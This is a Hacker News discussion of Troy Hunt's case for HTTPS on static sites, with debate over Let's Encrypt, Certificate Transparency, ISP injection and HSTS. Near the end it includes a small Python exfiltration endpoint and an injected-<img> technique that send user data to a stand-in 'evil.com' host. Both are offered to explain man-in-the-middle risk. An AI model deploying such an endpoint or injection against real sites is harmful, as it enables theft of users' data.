
Why Static Websites Need HTTPS - edward
https://www.troyhunt.com/heres-why-your-static-website-needs-https/
======
tambourine_man
Let's Encrypt is one of the best things that happened to the web recently. I
wish we had more choices though. Relying so much on a single party is
unnerving.

~~~
nofunsir
Do we have conclusive evidence yet that LE is not a honeypot? I mean, if _I_
were the NSA...

~~~
parliament32
It's a valid question, with two possible threat models:

1) the honeypot uses your private keys to MITM connections

Let's Encrypt doesn't handle your private keys. You generate them yourself,
and submit a CSR (certificate signing request) to LE to get a cert issued.
They have no knowledge of your private key.

2) the honeypot issues fake certs

Let's Encrypt submits every cert it issues to public Certificate Transparency
logs; see [https://crt.sh/](https://crt.sh/). To verify, it'd be pretty
trivial to create a browser extension (if one doesn't exist already) that
checks whether certs you encounter appear in the certificate log.
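As a starting point, here's a rough sketch of querying those logs for a domain
in Python, assuming crt.sh's unofficial output=json query parameter and its
current field names (both may change without notice):

    import requests  # third-party: pip install requests

    domain = "example.com"  # placeholder: the domain you want to monitor
    resp = requests.get("https://crt.sh/",
                        params={"q": domain, "output": "json"},
                        timeout=30)
    resp.raise_for_status()

    # One entry per logged certificate; an issuer you don't recognize
    # is a reason to investigate.
    for entry in resp.json():
        print(entry["not_before"], entry["issuer_name"], entry["name_value"])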

~~~
tialaramex
For CT, the finished system involves browsers checking that the server can
prove its certificates were logged (the ones you get from Let's Encrypt have
such proof embedded) and periodically talking to log monitors (e.g. ones owned
by your browser vendor) about the proofs they have seen.

If somebody has seen a proof that is contradicted by the published log state,
this means the logs involved are corrupt. If an otherwise authentic cert is
shown without proofs, or those proofs are bogus, the cert may have been
unlogged for nefarious reasons; it shouldn't be accepted and needs reporting.

Chrome has the start of this: it checks for the proofs. Firefox is getting
roughly the same feature "soon". But the finished system with all the bells
and whistles is probably a year or five away.

Good news is that even unfinished CT has been very effective.
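You can already poke at the embedded proofs (SCTs) yourself; a rough sketch
with Python's ssl module plus the cryptography package (the hostname is a
placeholder, and the extension class needs a reasonably recent cryptography):

    import ssl
    from cryptography import x509

    host = "example.com"  # placeholder
    pem = ssl.get_server_certificate((host, 443))
    cert = x509.load_pem_x509_certificate(pem.encode())

    # CT-logged certs carry their proofs in an extension; this raises
    # x509.ExtensionNotFound if the cert was issued without them.
    scts = cert.extensions.get_extension_for_class(
        x509.PrecertificateSignedCertificateTimestamps
    ).value
    for sct in scts:
        print(sct.log_id.hex(), sct.timestamp)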

------
adwhit
When I read things like that, I always think of the paper "The Rational
Rejection of Security Advice by Users". [1]

Yes, content injection is bad, but the chance of it happening multiplied by
the damage it could cause to your users is probably less than the effort
required to shift a static blog site to HTTPS. (Do not underestimate the leap
in difficulty from copy-pasting from an Nginx tutorial to understanding how
Let's Encrypt works.)

[1]
[https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.pdf](https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.pdf)

~~~
th3l3mons
The other side I would pose is: do you want anyone to alter your responses?
I'm currently trying to find the RFC, but I recall an ISP defining an RFC for
tampering with HTTP responses in transit. In addition, I recall seeing Comcast
(I believe) injecting JS to tell users that they are approaching their plan
limits.

Obviously, not the end of the world. But do you want any third party to easily
alter the response from your server to the client(s)?

~~~
Aaron1011
I believe you're thinking of RFC 6108:
[https://tools.ietf.org/html/rfc6108](https://tools.ietf.org/html/rfc6108)

Related HN discussion:
[https://news.ycombinator.com/item?id=15890551](https://news.ycombinator.com/item?id=15890551)

------
nanoscopic
I admin a number of different websites. The majority of them are static. I
have forced https redirect on some of them. On others I do not.

The only benefit of https I perceive in the case of static public content is
that ISPs cannot easily monitor which specific pages on my domains are being
visited. With plain http they could.

I don't particularly care if people get MITM'ed when visiting my static sites.
If they do, it's generally because they chose to use unsafe public access
points (wifi). This extends to some degree to all forms of wifi, since so many
of the security schemes in use on them can be easily broken.

My current understanding is that enterprise encryption using certs with wifi
is still secure and cannot currently be broken.

The only other party who could MITM normal customers on their own home
internet, while using wired connections, is, I believe, the ISP themselves.
Random third parties generally cannot do so. If there is some plausible way
they can, I would like to hear it.

If your ISP is MITMing you, I think you have bigger problems than whether they
change the content of my static site when you visit it. If they were, they
could potentially target your initial download of your browser and downgrade
it to http to infect your browser, so that you never realize afterwards that
https is faked out...

I think there are caching benefits to using plain http. The primary one is
that your ISP can cache your static content and save internet bandwidth
globally.

~~~
fmpwizard
> generally is because they chose to use unsafe public access points

It sounds like you are penalizing users for not using a vpn or some other
method when out of their homes. Yes, people can do that, but in 2018 having
https on the sites you manage is a lot easier than asking every possible
visitor to use a vpn. I hope you reconsider and enable https on all the sites
you admin.

> If your ISP is MITMing you, I think you have bigger problems than whether
> they change the content of my static site when you visit it. If they were,
> they could potentially target your initial download of your browser and
> downgrade it to http to infect your browser, so that you never realize
> afterwards that https is faked out...

They could, and maybe in countries other than the US you have plenty of ISP
choices, but in many places in the US, you are stuck with just one ISP.

And so far, we know that ISPs are manipulating http traffic, but they haven't
gone all the way to giving you an infected browser. Again, it is possible, but
I think the better approach is this: if we all do as much as we can to help
each other, the internet could be a better place.

~~~
Jach
It's all good to point this out, but it's a social argument, not a technical
one. If the technical arguments have been eliminated (e.g. you have no
technical use for encrypting the connection) then you're left with "Join us in
giving the finger to ISPs/cafe routers that inject foreign JS!" Don't be upset
when people say "Meh. Take it up with those ISPs directly, or with web browser
vendors, I don't care and don't want to join your crusade." At some point web
browsers will stop serving content over HTTP unless perhaps with a custom flag
turned on, and even then, some people will still not use HTTPS.

------
iamben
Two stories.

Firstly, I had a fair number of websites with a now EIG-owned company for
about 10 years. It was just a shared host, but they're all low traffic, and I
could easily add a domain name and spin up a blog/project. A few years back I
needed https for an API I was working with - the cost was something like $40 a
year for the domain, for a project that wasn't a money spinner. So I found
another (read: free) way to access the API.

Earlier this year I asked again. It was something like $20-$100 per domain to
put an https cert in place, even if I got it myself from LetsEncrypt. As the
entire package was about $100 a year (up 30%, with worse customer service
since EIG took over), I finally took the step and moved all my sites
elsewhere. The new host isn't much more expensive, but provides free
LetsEncrypt with a click from the control panel. I now use https on most
things.

Secondly, I have a few sites with a decent number of FB likes that have
accumulated as the result of some viral/social campaigns in the past. None
have forms on them; all are links to elsewhere. Currently those likes work as
(not insignificant) social proof. Move the site from http to https and I lose
the count on the Like button.

The cost in the first point (or the effort/time/cost of moving everything)
just hadn't been worth it for the smaller stuff. Facebook not sorting the
counts hasn't made it worth it in the second. I suspect my reasons are two of
many that stop people from upgrading - I guess I'm just saying that even with
the best intentions, there are other factors at play that prevent John
Everyman from making the move. Make it easy/default for him, and we get more
https everywhere.

~~~
thaniri
You can set up your apache/nginx or whatever webserver to redirect http
requests to https. That way you can still link to your website with an
[http://](http://) URL.
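The redirect itself is just a 301 per request; a toy sketch in Python for
anyone who wants to see the mechanism (in practice you'd put two or three
lines in your nginx/apache config instead, and the domain here is a
placeholder):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class RedirectToHTTPS(BaseHTTPRequestHandler):
        def do_GET(self):
            # Permanent redirect to the same path on the https:// origin.
            self.send_response(301)
            self.send_header("Location", "https://example.com" + self.path)
            self.end_headers()

    # Port 80 needs privileges; use e.g. 8080 for a local test.
    HTTPServer(("", 80), RedirectToHTTPS).serve_forever()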

~~~
iamben
Appreciated, but this is a hacky solution. If you use the graph explorer, the
http and https addresses have different counts. It's very frustrating - it
shouldn't be that way.

~~~
prophesi
Add your site to the HSTS Preload List, then it'll be very unlikely to have
any HTTP hits.
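For reference, the preload list expects roughly the following header on your
HTTPS responses (check hstspreload.org for the current requirements); a sketch
in the same toy Python style:

    from http.server import BaseHTTPRequestHandler

    # Rough preload requirements: one-year max-age, includeSubDomains,
    # and the explicit preload token (verify against hstspreload.org).
    HSTS_VALUE = "max-age=31536000; includeSubDomains; preload"

    class SecureHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            # Browsers only honor this header when it arrives over HTTPS.
            self.send_header("Strict-Transport-Security", HSTS_VALUE)
            self.send_header("Content-Type", "text/plain")
            self.end_headers()
            self.wfile.write(b"hello\n")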

~~~
iamben
Didn't realise that existed. Very useful, thanks!

But again, it's not exactly within reach for John Everyman - and it doesn't
sort out Facebook having different share counts for the https and http
domains.

~~~
prophesi
True. And you have to be extra careful with HSTS Preloading; if one of your
subdomains breaks because of HTTPS, it'll be a pain to get your domain taken
off the list.

------
davidmurdoch
And one reason it doesn't:
[https://meyerweb.com/eric/thoughts/2018/08/07/securing-sites-made-them-less-accessible/](https://meyerweb.com/eric/thoughts/2018/08/07/securing-sites-made-them-less-accessible/)

Secure websites make the web _less accessible_ for those who rely on metered
satellite internet (and I'm sure plenty of other cases).

Know who your demographic is and make sure you don't make things more
difficult for them. Maybe provide an option for users to access your static
site on a separate insecure domain, clearly labeled as such.

~~~
tialaramex
Having very high packet loss means something is badly wrong. A good wire-level
(yes I know, there are no wires, nevertheless) protocol aims to hit lower
packet loss rates by fiddling with other parameters. Example: let's say you
have 40MHz of assigned frequencies, but when both ends measure, they find 4MHz
of that is full of noisy crap and the rest is fairly quiet. Rather than lose
bits in those 4MHz and toss away many packets, why not keep the 36MHz with a
much lower error rate? If only 6,000 packets per second get through out of
10,000 sent, then an option to send 9,000 and have 8,000 of them arrive is
already a win.

Now, upgrading satellites is trickier and more expensive than upgrading your
home cable box, at the extreme obviously sending a bloke up to "swap out this
board for a newer one" is either tremendously difficult or outright impossible
depending on the orbital characteristics. But we shouldn't act as though high
packet loss rates at the IP layer are to be expected, they are avoidable. And
fixing them will do a lot more than just enable HTTPS to work better.

~~~
zaarn
>But we shouldn't act as though high packet loss rates at the IP layer are to
be expected, they are avoidable. And fixing them will do a lot more than just
enable HTTPS to work better.

At that distance the physical latency limit alone is almost a second; you
literally cannot go below it. The high latency will make a lot of protocols
simply time out or consider the packet lost.

At that distance you need some well-engineered ground equipment to handle the
signal losses: a dish and a high-powered transmitter that need to be within a
degree of the target. If you're off by a degree you're likely going to see
very bad packet loss. A degree is not much, and you could be thrown off by the
ground below stretching and twisting over the day due to temperature changes.
TV doesn't have to deal with sending data up the link, except via the
massively more powerful and expensive dishes of the TV networks.

Lastly, from the ground to geostationary orbit you may find that your 40MHz
band is full of crap: not because someone else is sending, but because you're
sending through a solid belt of radiation and magnetic flux. You'll find that
a wide range of bands either suck at penetrating the atmosphere, suck at
penetrating the magnetic field, or get drowned out by interference from half
the universe.

The layers above IP have ways to handle packet loss for a reason (although the
original reason was bad copper cables and bad MACs). The MAC layer is another
problem: you're not the only one who wants to use the very limited resources
of the sat. One of the most common and effective forms of bandwidth limiting
is dropping packets, and it's normal. Packets drop all the time; every TCP
connection drops packets. It happens, and almost all protocols deal with it on
one level or another.

------
peterwwillis
If browsers supported a method to provide content securely without the need to
encrypt everything, lots of uses of the web would not be hampered by the
TLS-everything-that-moves movement. The limitations we have accepted in our
browsers are what cause these conflicts. But we don't have to accept them. We
could do with less propaganda and more compromise and innovation.

~~~
ezekg
I'm unsure how you could do what you've said without encryption. Any ideas?

~~~
maxvu
Cryptographic verification?

~~~
ezekg
Sure, but that would still leave the data open to the world. Not an
alternative to TLS.

~~~
peterwwillis
Most of the content on the web is intentionally open to the world.

~~~
ezekg
But our personal data is not. So much data is potentially made available from
an unencrypted HTTP request.

~~~
peterwwillis
Nobody is saying that personal data should be unencrypted.

------
patrickmcmanus
the post is good... but also: confidentiality matters.

Think about a library. There are no secrets in the stacks that need to be kept
from public disclosure. What is secret is the act of using the library - i.e.
what people choose to read.

------
cm2187
Actually, one service that DNS providers should offer is generating and
renewing Let's Encrypt wildcard certificates automatically, and letting their
clients download them through some API. That would make life a lot easier for
less technical devs who are intimidated by the complexity of PKI.

------
ecesena
Github pages supports TLS even for custom domains now, via Let's Encrypt. At
this point, I don't think there's any excuse anymore for having a static
website without TLS. Either use Github pages, or just use your favorite
hosting provider and put a CDN in front of it.

Note: I'm not affiliated with Github, but I've used them multiple times, and
just recently discovered they now support TLS. If you want to see an example:
[https://solokeys.com](https://solokeys.com) is hosted on Github pages.

~~~
mr_toad
As far as I know Github is the _only_ static site provider that will do this
for you.

I’m scratching my head trying to figure out the best way to do automated
certificate renewal for other providers. It’s not like you can run certbot on
a static page.

~~~
ValentineC
> _As far as I know Github is the _only_ static site provider that will do
> this for you._

Netlify automatically does this [1], and Zeit's Now too, I think [2].

[1] [https://www.netlify.com/docs/ssl/](https://www.netlify.com/docs/ssl/)

[2]
[https://zeit.co/docs/examples/static](https://zeit.co/docs/examples/static)

------
zzzcpan
Here's the truth about security: people are clueless about it and so
corporations and governments abuse that by pushing their own agendas, not
related to security.

The same corporations that tell you to "secure" your unimportant static
website with https also want to force you to run random javascript in your
browser from unknown parties, identify you at all times, link everything to
your phone number, etc. In the end we are all going to be worse off with this
let's-encrypted web, with more control than ever in the hands of those few US
corporations.

~~~
yjftsjthsd-h
How are those related? Letsencrypt doesn't try to identify anyone, and
certainly doesn't run JavaScript on your site.

~~~
grosjona
I wonder what would happen if Let's Encrypt started charging for their service
AFTER HTTPS became compulsory. Seems like a great (but evil) business
strategy. All these CAs could just start increasing their prices and we'd all
be forced to pay.

If you understand human behavior, then you know that this WILL happen
eventually.

~~~
tialaramex
This might even make sense as "a great (but evil) business strategy", except
Let's Encrypt isn't a business. It's provided by a charity: ISRG, the Internet
Security Research Group, set up for exactly this purpose by people from
Mozilla (a charity) and the EFF (another charity).

I suspect the people behind ISRG weren't as paranoid as the Free Software
Foundation about being corrupted by some hypothetical evildoers (the FSF has a
whole mechanism to try to ensure that if you somehow take over the Foundation,
you can't use its resources to counter its original purpose), but you're going
to need a bit more than a vague idea that people are capable of evil as an
explanation for why good things are actually not good.

~~~
schoen
I don't know who has what legal remedies when a nonprofit acts
inappropriately, but another observation is that most of Let's Encrypt's
technology is developed in public.

[https://github.com/letsencrypt](https://github.com/letsencrypt)

If you needed to set up another ACME-compatible CA on the same model (which
could then be a drop-in replacement compatible with the existing client base),
it would be a lot less expensive (although it would require datacenter build-
out, hiring an operations team, and a variety of PKI-specific stuff like key
ceremonies, HSMs, cross-signing, CPS, and audits).

------
gt2
A big reason is that Chrome (and others?) specifically shows 'Not Secure' for
all sites not using https.

~~~
H1Supreme
This is a massive reason, imo. The average user views that url annotation as a
bad thing. They don't know the site is static, or even what "static" refers
to.

~~~
AgentME
Even if they knew the site was static, "not secure" would still be valid. An
ISP or malicious wifi network may be recording their browsing history,
downsampling images, injecting or replacing ads, replacing executables with
backdoored versions, adding fake login forms or popups to get the user to give
a password of theirs, etc.

------
Fnoord
What if your website is only accessible to you from within your LAN, such as
your router or your set-top box? If you have DHCP as well and don't control
the DNS, or don't have root (such as on IoT devices), then you cannot use
Let's Encrypt. Or am I missing something?

~~~
berbec
I used to have a $75 netgear router at my house. I changed the local DHCP
settings to give out a raspberry pi's internal IP as the DNS server. I run
dnsmasq on the pi and resolve local hosts that way. Every internal service in
my house uses HTTPS, and I have about a dozen.

~~~
logan12358
Sorry this is a day late, but how do you get certificates for internal
services? Do you manually trust them on each client? Or do you have a wildcard
cert from a public server? Is there some cleaner way to manage internal HTTPS?

~~~
berbec
I resolve internal services as subdomains of a domain I own. I use a wildcard
cert I get issued on an EC2 instance. I script an sftp upload of the new cert
on every renewal to my main internal machine, where it is shared via nfs. This
is the simplest way I've found.
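A sketch of that kind of renewal hook in Python with the third-party paramiko
library (the hostnames and paths here are made up; the same idea works as a
certbot --deploy-hook shell script):

    import paramiko  # third-party: pip install paramiko

    # Hypothetical paths: where certbot leaves the renewed wildcard cert,
    # and where the internal machine shares it from via nfs.
    LOCAL = "/etc/letsencrypt/live/example.com/fullchain.pem"
    REMOTE = "/srv/certs/fullchain.pem"

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # pin host keys in real use
    ssh.connect("internal.example.com", username="certs",
                key_filename="/home/certs/.ssh/id_ed25519")

    sftp = ssh.open_sftp()
    sftp.put(LOCAL, REMOTE)  # repeat for privkey.pem
    sftp.close()
    ssh.close()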

------
alerighi
The drawback of using https everywhere is that a big company can't locally
cache things that get downloaded again and again from the network, like OS and
application updates, videos on the web, and so on.

I think we need an alternative to https: a protocol that guarantees only
authentication (signing the packets, basically) and doesn't encrypt content.
You could verify that what you get is what the website owner intended (no
mitm) and you could still have a cache.
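That sign-but-don't-encrypt idea is easy to prototype at the application
layer; a minimal sketch with Ed25519 from Python's cryptography package (a
real deployment would still need key distribution, i.e. most of a PKI):

    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

    # The site owner signs the content once; anyone (including caches)
    # can then re-serve the bytes unmodified.
    private_key = Ed25519PrivateKey.generate()
    public_key = private_key.public_key()

    page = b"<html>static content</html>"
    signature = private_key.sign(page)

    # A client holding the site's public key can verify integrity even
    # though the bytes travelled, and were cached, in the clear.
    try:
        public_key.verify(signature, page)
        print("content authentic")
    except InvalidSignature:
        print("content was modified in transit")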

------
Sohcahtoa82
I feel like this article has been posted a dozen times already, but the "past"
link is showing this as the only submission.

EDIT: Nevermind, I'm confusing it with similar discussions:

[https://news.ycombinator.com/item?id=17651652](https://news.ycombinator.com/item?id=17651652)

[https://news.ycombinator.com/item?id=17599022](https://news.ycombinator.com/item?id=17599022)

[https://news.ycombinator.com/item?id=17605973](https://news.ycombinator.com/item?id=17605973)

------
zaarn
There is one static webpage that I won't put HTTPS on: the dashboard of my
pi.hole.

Though it's more of an architectural decision as it enables the DNS server to
blackhole HTTPS more effectively (since it just gets a CONNREFUSED back).

Really, it's an exception to the rule and only because I can't ask my guests
to install my pihole CA on their devices (many of which don't support that
stuff anyway).

Well, and there is that other website, but the prime directive forbids me from
mentioning it...

~~~
Avamander
You can buy a domain name and do DNS auth. Requires no open ports and you'll
get a trusted cert for that one Pi. I did it for mine (but with SNI
verification).

~~~
zaarn
It's a pi.hole: it's only local, and there is a reason it doesn't open port
443 and only works on 80. On a local, non-wireless LAN this is not a concern
in my threat model.

------
Mikhail_Edoshin
I went there to see why, and the only subhead I understood without searching
was "HTTPS is easy". I gather only HTTPS is easy nowadays :)

------
casper345
Not security related, but for SEO: having HTTPS means google treats your
website with more mercy in the storm of search results.

------
hiccuphippo
How can I go about securing a server without a domain? Just a static IP? Let's
Encrypt doesn't allow IPs and the owner doesn't care for a domain.

Context: small business with a web based application in a local server, all
they need is to be able to access reports from their phone.

~~~
detaro
Self-signed certificate (or own CA and certificate signed by that). Buying a
certificate for an IP is more expensive than a domain.
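A minimal sketch of such a self-signed certificate for a bare IP, using
Python's cryptography package (192.0.2.10 is a documentation placeholder; the
SAN entry is the part that matters, since browsers ignore the CN):

    import datetime
    import ipaddress
    from cryptography import x509
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.x509.oid import NameOID

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "192.0.2.10")])

    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)  # self-signed: issuer == subject
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        # Browsers match the SAN, not the CN, so the IP must appear here.
        .add_extension(
            x509.SubjectAlternativeName(
                [x509.IPAddress(ipaddress.ip_address("192.0.2.10"))]
            ),
            critical=False,
        )
        .sign(key, hashes.SHA256())
    )

    with open("cert.pem", "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))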

~~~
hiccuphippo
I've tried a self-signed certificate somewhere else, but it seems Chrome
doesn't add the certificate permanently, so every few days they get the
"scary" not secure window again.

I'll try with my own CA.

~~~
breakingcups
Can I suggest registering a domain for $1, pointing that at the IP and using
LetsEncrypt? Probably less effort in the long run.

------
grosjona
I think the argument that you can't trust ISPs is weak. With HTTPS, you still
need to trust certificate authorities. It is somewhat suspicious that Google
suddenly decided to create their own Certificate Authority in 2017. Forcing
every website to use HTTPS just reduces the pool of entities who are able to
track and manipulate us, and it gives a false sense of security.

There is no doubt that this change is designed to take power away from some
entities and to put it in the hands of a few key players which Google trusts.

Also, the video created by the author is highly deceptive; he makes it look
like he has hacked the website itself, when in reality he has only intercepted
the traffic to his own machine, modifying only his own view of the website; he
hasn't actually hacked anything. I'm sure the author is being intentionally
deceptive; he knows exactly who the target audience for that video is and
exactly what it looks like.

~~~
AgentME
Certificate authorities that participate in Certificate Transparency are
forced to publish all certificates they issue, so site owners can tell if a
fraudulent certificate for their own domain is ever generated. I think
browsers are pushing for all CAs to adopt Certificate Transparency. This
greatly reduces the power of malicious CAs.

------
AnaniasAnanas
All websites need onion/i2p addresses, not HTTPS.

------
bullen
chrome://flags

Mark non-secure origins as non-secure

Disabled

------
EGreg
People here are bringing up the difficulty for a regular user to set up HTTPS.

I want to go one further: WHY does a regular user need to buy a human-readable
domain name, maintain it, and pay for a hosting company to host on that
domain?

It used to be worse - you had to have your own machine or use some crappy
shared hosting service. Amazon figured out that letting people share managed
virtual machine instances was good savings. That’s now called “the cloud” but
it’s still under the control of some landlord - Amazon, DigitalOcean, etc.

Let’s face it, the easiest thing we have today is some web based control panel
by CPanel running on some host that charges $5/month or something.

It’s 2018. Why don’t we have something like MaidSAFE and Dat working yet? We
should have:

1) End-to-end encryption

2) One giant, actually decentralized cloud composed of all nodes running the
software

3) Storing chunks of encrypted data using Kademlia DHT or similar

4) Maybe even periodic churn on the back-end so you can't find and collude
with the servers hosting the chunks

5) All underlying URLs would be non-human-readable, and clients would display
(possibly outdated) metadata like an icon and title (this metadata may change
on the Web anyway). Storing and sharing could occur using QR codes, NFC,
bluetooth, Javascript variables, or anything else. For static files, the links
could be content-addressable.

6) All apps and data would be stored encrypted in the cloud and only decrypted
at the edges. They would run on the clients only. Apps could also be
distributed outside the cloud, but usually just via a link to a cloud URL.

7) Communities would likewise be just regular users, rather than private
enterprises running privileged servers with some software, as github is now.
No more server-side SaaS selling your data, or epic hacks and breaches.

8) Users would have private/public key pairs to auth with each community or
friend. They would verify those relationships on side channels for extra
security if needed (e.g. meet in person or deliver a code over SMS or phone).
Identity and friend discovery across domains would be totally up to the user.

9) Private keys would never leave devices, and encryption keys would be
rotated if a device is reported stolen by M of N other devices.

10) Push notifications would be done by shifting nodes at the edges, rather
than by a centralized service like Apple or Google, which in exchange for
convenience can expose a user to surveillance and timing attacks.

No more waiting endlessly to be “online” in order to work in a SaaS document.
The default for most apps is to work offline and sync with others later.

No central authorities, CAs or any crap like that. Everything is peer to peer.
The only “downside” is the inability to type in a URL. Instead, you can use
one or more indexes (read: search engines) some of which will let you type
existing URLs, or something far more user friendly than that, to get to
resources.

Domains and encryption key generation would be so cheap that anyone can have a
domain for a community of any kind, or even just for collaborating on a
document.

There won’t any longer be a NEED for coupling domains to specific hardware
somewhere, and third party private ownership/stewardship of user-submitted
content would be far less of a foregone conclusion, fixing the power imbalance
we have with the feudal lords on the Internet today.

Once built, this can easily support any applications from cryptocurrency to
any group activities, media, resources etc.

If you are intrigued by this architecture, and want to learn more or possibly
get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!

~~~
Avamander
> I want to go one further: WHY does a regular user need to buy a human-
> readable domain name, maintain it, and pay for a hosting company to host on
> that domain?

Because there's no interest in that. Getting a domain name is already cheap
and easy.

> Storing chunks of encrypted data using Kademlia DHT or similar [...]

I've yet to see any P2P system have low latency, high speed and high
reliability.

> All underlying URLs would be non-human-readable and clients would display
> (possibly outdated) metadata like an icon and title (this metadata may
> change on the Web anyway). Storing and sharing could occur using QR codes,
> NFC bluetooth, Javascript variables, or anything else. For static files, the
> links could be content-addressable.

Why?

> The only “downside” is the inability to type in a URL.

Good luck telling your friend that the nice webstore you got your hoodie from
is [insert non-readable non-pronounceable url].

> and third party private ownership/stewardship of user-submitted content
> would be far less of a foregone conclusion

This is unacceptable for law enforcement

> If you are intrigued by this architecture, and want to learn more or
> possibly get involved, contact greg+qbix followed by @ qbix.com - we are
> BUILDING IT!

Oh this is an ad...

~~~
fwip
I'm not trying to advertise, but Beaker browser does a real good job of making
p2p delivery transparent to the end user. It's probably slower than most sites
in normal usage, but certainly acceptable speeds for static sites, and it
performs better under the hug-of-death a site gets when posted on Hacker News.
:)

Plus, it already has existing methods to map DNS records or servers to the p2p
records, so I can access dat://beakerbrowser.com/ or dat://epa.hashbase.io/
and get it served across the p2p network or pull it up offline if I've viewed
it before.

------
some_account
Why wouldn't you? It took me 30 mins to read and set up a cert from let's
encrypt.

~~~
gt2
Don't underestimate the weight of decisions, let alone the knowledge of a
choice, and the care.

Also, see how often humans don't change from default settings -- ringtones,
bootstrap themes, etc..

------
austincheney
I have recently adopted HTTPS on my own site, because there are substantial
performance benefits with HTTP/2 that are only available over HTTPS.

There are many arguments in the article, and more that he links to, arguing
for the security benefits of HTTPS. HTTPS is good for protecting content.

One very serious argument that HTTPS evangelists avoid: when there is no
content to protect, the security benefits of HTTPS evaporate. My site is a web
application that stores all user data in the user's browser. Their data does
not come back to the server. The only thing that crosses the wire is a request
for the application code and a response with that code.

I would argue this model of application is substantially more secure than
sending data across the wire, regardless of whether that transmission is
encrypted. There is nothing individually identifiable or preferential about
the application code. The content, identifiable information, and
personal/private details remain with the user, where they reside anyway.

---

EDIT

Before everybody jumps on the MITM attack bandwagon, be aware of
[https://en.wikipedia.org/wiki/Same-origin_policy](https://en.wikipedia.org/wiki/Same-origin_policy)

A man-in-the-middle attack can void the integrity of data crossing the wire,
but it cannot trivially break privacy with simple modifications to code. This
is by design in the architecture of the web.

The only violation in question is code integrity (the integrity portion of the
security CIA triad). Fortunately, this is a solved problem so long as the
application is open source. If an integrity violation occurs that renders the
application defective, simply compare the transmitted application code against
the stored, publicly available application code. This is made easier when the
application in question is a diff tool that can fetch code from across the
wire.
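A sketch of that comparison in Python (the URL and digest are placeholders;
this is essentially what subresource integrity automates for individual
assets):

    import hashlib
    import urllib.request

    URL = "http://example.com/app.js"  # placeholder
    # Digest of the published, known-good source (placeholder value).
    EXPECTED = "0" * 64

    with urllib.request.urlopen(URL) as resp:
        delivered = resp.read()

    if hashlib.sha256(delivered).hexdigest() != EXPECTED:
        print("transmitted code differs from the published code")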

~~~
gsnedders
> One very serious argument that HTTPS evangelists avoid is when there is no
> content to protect the security benefits of HTTPS evaporate. My site is a
> web application that stores all user data in their browser. Their data does
> not come back to the server. The only thing that crosses the wire is a
> request for the application code and a response with that code. I would
> argue this model of application is substantially more secure that sending
> data across the wire regardless of whether that transmission is encrypted.

That's a case where HTTPS really is essential! If you serve your application
code over HTTP, then I can MiTM that connection and replace your application
code with something that reads all the user data from the user's browser and
then sends it to evil.com.

~~~
austincheney
No.
[https://en.wikipedia.org/wiki/Same-origin_policy](https://en.wikipedia.org/wiki/Same-origin_policy)

~~~
AgentME
If evil.com serves the proper CORS headers, then any site is allowed to make
AJAX calls to it.

Also, the attacker could inject <img> tags with a src attribute pointing to
[https://evil.com?userdata=...](https://evil.com?userdata=...).

Also, if the attacker is already man-in-the-middle attacking yoursite.com,
they could make the site's code make ajax calls to
"yoursite.com/nothing-to-see-here". Users looking at the network requests may
not notice anything is going on.
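To see why CORS doesn't save you here: the permissive header comes from the
attacker's own server, which they fully control. A minimal sketch of such an
exfiltration endpoint in Python (and note that an injected <img> doesn't even
need CORS):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Exfil(BaseHTTPRequestHandler):
        def do_GET(self):
            # Log whatever the injected script packed into the query string.
            print("received:", self.path)
            self.send_response(200)
            # The attacker opts their own endpoint in to cross-origin
            # reads, so fetch/XHR from the victim page is permitted.
            self.send_header("Access-Control-Allow-Origin", "*")
            self.end_headers()

    HTTPServer(("", 8080), Exfil).serve_forever()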

~~~
austincheney
CORS requires an HTTP header whitelisting allowed domains. If the attacker can
modify the HTTP headers, they don't need to modify the HTTP body in order to
perform an attack.

> Also, the attacker could inject <img> tags

First, the image needs to be requested using the same protocol that requested
the page or it will notify the user of insecure assets. Second, but they would
have to write a custom script to gather the data to append as the URI query
string. Third, the image would need to be injected after the user has manually
entered information to the site, which eliminates static images in the HTML
source. Fourth, actually test this. When I test it I get a CORS error in the
browser. Strangely, Chrome reports this as a warning instead of as an error,
but the request is blocked and it never leaves the browser.

> Also, if the attacker is already man-in-the-middle attacking yoursite.com,
> they could make the site's code make ajax calls to

No, that is not allowed by the browser and will throw an error. It violates
same origin policy. If you can figure out how to break same origin policy
Google will pay you $5000 for reporting a significant issue to their bug
bounty.

~~~
AgentME
> CORS requires an HTTP header whitelisting allowed domains. If the attacker
> can modify the HTTP headers, they don't need to modify the HTTP body in
> order to perform an attack.

The attacker owns evil.com. They can make it have any headers they want, and
then javascript on yoursite.com or any other site is allowed to make ajax
requests to it. (Of course, they'd still need to do a man-in-the-middle attack
on yoursite.com to modify yoursite.com's javascript. They technically don't
need to involve evil.com if they're MITMing yoursite.com as I mentioned at the
end of my post above, but it is a technically possible thing for them to do.)

> First, the image needs to be requested using the same protocol that
> requested the page or it will notify the user of insecure assets.

The attacker can make evil.com use HTTPS if they need to. There's no
restrictions stopping attackers from getting certificates for their own
domains. HTTPS doesn't signify that the owner of the domain is trustworthy; it
just signifies that the contents you receive from a URL weren't MITMed.

> Fourth, actually test this. When I test it I get a CORS error in the
> browser. Strangely, Chrome reports this as a warning instead of as an error,
> but the request is blocked and it never leaves the browser.

Did you test this on HN? HN uses an unusually restrictive
Content-Security-Policy header to restrict where assets can be loaded from. It
is a protection against this sort of attack, but only a weak one against a
determined attacker who can manipulate page javascript or html: an attacker
could make every element on the page a link to evil.com?userdata=..., which a
lot of users will probably click. The user might realize something is up, but
the attacker has already gotten their data, so it's a bad consolation prize.
Also, in the specific case of MITM attacks, CSP is no help, since an attacker
can just strip the header off.

